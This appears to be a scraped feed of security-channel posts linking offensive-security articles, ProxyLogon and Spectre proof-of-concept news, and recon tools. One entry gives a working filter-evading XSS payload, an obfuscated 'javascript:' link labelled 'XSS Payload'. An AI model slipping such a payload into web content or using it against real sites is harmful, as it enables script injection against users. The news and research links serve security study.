EDR and Blending In: How Attackers Avoid Getting Caught

Part 2 of the series

https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught

#Offensive_security
Offensive Windows IPC Internals 2: RPC
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
Offensive Windows IPC Internals 1: Named Pipes
https://csandker.io/2021/01/10/Offensive-Windows-IPC-1-NamedPipes.html

<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

XSS Payload

@bugpoint
Good Channel for Public Bug Bounty Write-Up

dwisiswant0/proxylogscan - A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855) / ProxyLogon.
https://ift.tt/3cgBplO

Browser exploit via side channel attack: Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled.
"This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means noscript blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system."

https://arxiv.org/abs/2103.04952

https://thehackernews.com/2021/03/new-browser-attack-allows-tracking.html

Microsoft's GitHub under fire after disappearing proof-of-concept exploit for critical Microsoft Exchange vuln.

On Wednesday, shortly after security researcher Nguyen Jang posted a proof-of-concept exploit on GitHub that abuses a Microsoft Exchange vulnerability revealed earlier this month, GitHub, which is owned by Microsoft, removed code, to the alarm of security researchers.

15-year-old Linux kernel bugs let attackers gain root privileges

https://ift.tt/3rWL5s0

New PoC for Microsoft Exchange bugs puts attacks in reach of anyone

https://ift.tt/3eDwtdt

Google has released proof-of-concept code for conducting a Spectre-based attack against its Chrome browser to show how web developers can take steps to mitigate browser-based side-channel attacks.

Exploit Code repo: https://github.com/google/security-research-pocs/tree/master/spectre.js

https://www.theregister.com/2021/03/12/google_spectre_code/

DDOS Attack in Real" by Amir Kiani, LIVE NOW.

You can join live Q&A after presentation at 16:45 PM IRST ( 13:15 PM GMT ) we have live Q&A with presenters on Discord server.

https://www.youtube.com/watch?v=Lwwdhkm6qBI&list=PLWCWUHzTw-g-42Fxr5X1cOZQiar5APpI4&index=14

Crimson is a tool that automates some of the Pentester or Bug Bounty Hunter tasks. It uses many open source tools, most of them are available for download from github.

https://github.com/Karmaz95/crimson
#tools #recon #bugbounty
@securation